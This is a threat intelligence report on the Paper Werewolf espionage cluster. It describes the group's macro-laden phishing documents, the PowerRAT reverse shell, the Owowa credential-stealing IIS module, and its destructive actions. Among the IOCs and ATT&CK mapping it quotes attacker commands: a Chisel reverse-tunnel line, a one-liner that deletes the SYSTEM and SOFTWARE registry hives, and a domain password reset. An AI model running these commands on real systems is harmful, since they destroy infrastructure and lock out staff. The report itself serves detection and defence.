Espionage cluster Paper Werewolf engages in destructive behavior
The BI.ZONE Threat Intelligence team has recorded a surge in the activity of the Paper Werewolf cluster (also known as GOFFEE), which has conducted at least seven campaigns since 2022. Among the victims are government, energy, financial, media, and other organizations.
The adversaries send out phishing emails with a Microsoft Word attachment containing a malicious macro. However, their latest activity goes beyond espionage purposes: we have detected a case where Paper Werewolf disrupted the operation of the compromised infrastructure.
- While primarily committed to cyber espionage, such clusters can ruin the operation of target infrastructures simply out of spite, once their primary goal is achieved.
- Apart from experimenting with post‑exploitation frameworks, the adversaries develop their own implants for such frameworks which significantly impedes detection.
- The attackers opt for the PowerShell interpreter as a versatile tool that enables them to bypass corporate defenses.
Paper Werewolf uses Microsoft Word documents that contain a malicious macro. Such files are likely distributed via phishing emails.
It is noteworthy that the adversaries often apply the Gophish open‑source framework to organize their mailings. The framework is designed for testing enterprise vulnerability to phishing.
Example of a phishing email sent by the attackers
Link pointing to the use of Gophish
The distributed files are masked as documents from various organizations (a research institution, a municipal administration, a power grid company, etc.).
As the malicious file is encrypted, the victim is prompted to allow macros.
Encrypted content of a malicious document
Once the victim allows macros, the document content is decrypted.
Decrypted content of a malicious document
The document is decrypted by replacing special characters with respective Russian letters.
Document decryption
Searching for the payload within the document starts after the DigitalRSASignature keystring. The payload is Base64‑encrypted and has two parts divided by a CHECKSUM string.
Encrypted payload
The macro decrypts the payload and writes it into two files:
%USERPROFILE%\UserCache.ini(PowerShell script)%USERPROFILE%\UserCache.ini.hta(HTA)
To gain persistence in the compromised system, the path to UserCache.ini.hta is written into the following registry parameter:
HKEY_CURRENT_USER\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Windows\LOAD
To conceal the malicious programs in the compromised system, the threat actor uses environment variables:
-
AZURE_RESOURCE_GROUP=JAB0AHkAegBmAHQAbgBnAGkAYgBpACAAPQAgACgARwBlAHQALQBEA[redacted] -
ONEDRIVE_RESOURCE_GROUP=AuADAAIABTAGEAZgBhAHIAaQAvADUAMwA3AC4AMwAiACkAOwA[redacted] -
VB=VBScript -
AZURE_DECODE=[System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($env:AZURE_RESOURCE_GROUP+$env:ONEDRIVE_RESOURCE_GROUP))
In one of the cases, the malicious document contained a link to a 1×1 pixel image. Using this trick, the attackers can monitor whether the victim has opened the malicious document.
The HTA file creates and runs a file %USERPROFILE%\UserCacheHelper.lnk.js to execute the PowerShell script %USERPROFILE%\UserCache.ini.
The decrypted content of UserCache.ini is a reverse shell being a PowerShell script known as PowerRAT, which:
- installs a
Hiddenattribute for theUserCache.iniandUserCache.ini.htafiles - calls the server
hxxp://[redacted]:80/api/texts/<victim_id>for commands, wherevictim_idstands for[computer name]_[username]_[serial number of the system disk].
These are XML commands with the attributes below:CountRuns, a command runs counterInterval, a command interval in minutesModule, a Base64-encoded command (a PowerShell script)
- runs the command received from the server, which is launched through
Invoke‑Expression
In other attacks, the adversaries use their own loader mimicking explorer.exe. The malicious program loads and opens a decoy document. The decoy is written into the %TEMP% directory. Then the loader sends an HTTP POST request to the server to advance to the next stage. As of the date of this article, the next stage was not available for research, but we suppose that it involves a Mythic framework agent developed by the adversaries, known as PowerTaskel and QwakMyAgent. The function names in the loader are hashed with the Fowler–Noll–Vo algorithm.
Curiously enough, the attackers use this implant along with another framework agent, Poseidon.
The threat actor’s arsenal also has a malicious IIS module Owowa that enables them to retrieve credentials during user authorization in the Outlook Web Access (OWA) service. The retrieved data is stored in the RAM in HashSet.
Example of data intercepted by Owowa
One of the Owowa modules would return a Base‑64‑encrypted dataset where the request header contains the username ZaDS0tojX0VDh82, and would delete the content of the decrypted dataset and return an Ok string (RSA‑encrypted) where the request header contains the username oACgTsBMliysfk.
To create a redundant access channel to the compromised IT infrastructure, the attackers resort to Chisel:
mastc.exe client --tls-skip-verify -v https://[redacted]:49611 R:socks
They probably use PsExec to run commands in remote systems. In particular, to perform destructive actions:
cmd.exe /c 'shutdown /r /f /t 5 && reg delete HKEY_LOCAL_MACHINE\SYSTEM /f && reg delete HKEY_LOCAL_MACHINE\SOFTWARE /f'
To hinder the staff’s interaction with the compromised IT infrastructure, the criminals change account passwords:
net user [redacted] [redacted] /domain
In the cases above, the attackers use a PowerShell script to run commands.
fa8853aaa156485855b77a16a2f613d9f58d82ef63505be8b19563827089bf5213252199b18d5257a60f57de95d8c6be7d7973df7f957bca8c2f31e15fcc947b8ba4cd7ea29f990cb86291003f82239bfafe28910d080b5b7d3db78e83c1b6f337b3fa8a3a05e4aedb25eb38d9e4524722f28c21fac9f788f87113c5b9184ef5804cd68f40d0bb93b6676447af719388e95cafd5a2b017a0386eb7de590ebf17disk-yanbex[.]rulobbyluxuries[.]com94.103.85[.]47185.244.182[.]875.252.176[.]5585.198.110[.]216
You can find more indicators of compromise related to the Paper Werewolf activity on the BI.ZONE Threat Intelligence portal.
| Tactic | Technique | Procedure |
|---|---|---|
| Resource Development |
Acquire Infrastructure: Domains |
Paper Werewolf registers C2 server and malware domains |
|
Acquire Infrastructure: Virtual Private Server |
Paper Werewolf uses VPS to host C2 servers and malware |
|
|
Develop Capabilities: Malware |
Paper Werewolf uses own crafted malware such as PowerTaskel |
|
|
Obtain Capabilities: Tool |
Paper Werewolf uses tools such as Chisel, PsExecand Mythic, and a Mythic post‑exploitation framework |
|
|
Stage Capabilities: Upload Malware |
Paper Werewolf stores the payload on its servers |
|
| Initial Access |
Phishing |
Paper Werewolf sends out phishing emails to distribute documents with a malicious macro |
| Execution |
Command and Scripting Interpreter: PowerShell |
Paper Werewolf uses PowerShell tools such as PowerRAT and PowerTaskel to run C2 commands from the compromised host |
|
Command and Scripting Interpreter: Visual Basic |
Paper Werewolf creates a VBA macro in documents and an HTA file that creates and executes a VBScript |
|
|
User Execution: Malicious File |
Paper Werewolf targets its victims through malicious decoy documents from various companies and government agencies |
|
| Persistence |
Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
Paper Werewolf gains persistence in the compromised system by using a registry parameter |
|
Server Software Component: IIS Components |
Paper Werewolf installs a malicious Owowa module on the IIS server |
|
| Defense Evasion |
Deobfuscate/Decode Files or Information |
Paper Werewolf decrypts the payload in malicious documents using a VBA macro. Paper Werewolf decrypts and runs the malicious content of the environment variables in the compromised system |
|
Hide Artifacts: Hidden Files and Directories |
Paper Werewolf uses PowerRAT which installs a |
|
|
Obfuscated Files or Information: Dynamic API Resolution |
Paper Werewolf applies the Fowler–Noll–Vo algorithm to hash the names of WinAPI functions used in the malicious loader |
|
|
Obfuscated Files or Information: Embedded Payloads |
Paper Werewolf uses malicious documents to store the Base64‑encoded payload |
|
|
Obfuscated Files or Information: Fileless Storage |
Paper Werewolf uses environment variables |
|
|
Obfuscated Files or Information: Encrypted/Encoded File |
Paper Werewolf uses Base‑64-encrypted payloads and PowerRAT commands |
|
| Credential Access |
Input Capture: Web Portal Capture |
Paper Werewolf retrieves credentials during user authorization in the OWA service by using the malicious IIS Owawa module |
| Discovery |
System Information Discovery |
Paper Werewolf uses PowerRAT to retrieve the name of the compromised host, the serial number of the system disk |
|
System Owner/User Discovery |
Paper Werewolf uses PowerRAT to retrieve the compromised host username |
|
| Lateral Movement |
Lateral Tool Transfer |
Paper Werewolf uses PsExec to advance in the compromised IT infrastructure |
| Command and Control |
Application Layer Protocol: Web Protocols |
Paper Werewolf uses HTTP to communicate with the C2 servers and receive the payload |
|
Encrypted Channel: Asymmetric Cryptography |
Paper Werewolf uses the RSA algorithm to decrypt credentials intercepted by the malicious IIS Owowa module |
|
|
Fallback Channels |
Paper Werewolf uses Chisel as a redundant access channel to the compromised IT infrastructure |
|
|
Ingress Tool Transfer |
Paper Werewolf uses own loaders to deliver and launch the malware |
|
| Impact |
Data Destruction |
Paper Werewolf uses the commands |
|
System Shutdown/Reboot |
Paper Werewolf uses the command |
The BI.ZONE EDR rules below can help organizations detect the described malicious activity:
win_enable_macros_in_ms_office_documentwin_spawning_untipical_process_by_ms_office_appwin_hta_file_was_created_by_ms_office_appwin_unusual_mshta_parent_processwin_persistence_via_load_regkey_was_detectedwin_set_hidden_file_attribute_for_executable_or_scriptwin_suspicious_powershell_execution_code_from_filegen_chisel_usage_detectedwin_using_psexec_to_execute_process_on_remote_host
To stay ahead of threat actors, you need to understand their methods and tools and take this information into account when assessing the threat landscape of your organization. For this purpose, we would recommend that you leverage the data from the BI.ZONE Threat Intelligence portal. It provides information about the current attacks, threat actors, their tactics, techniques, and tools. This data helps to ensure the precision of your security solutions, which in turn accelerates incident response and protects your company from the most critical threats.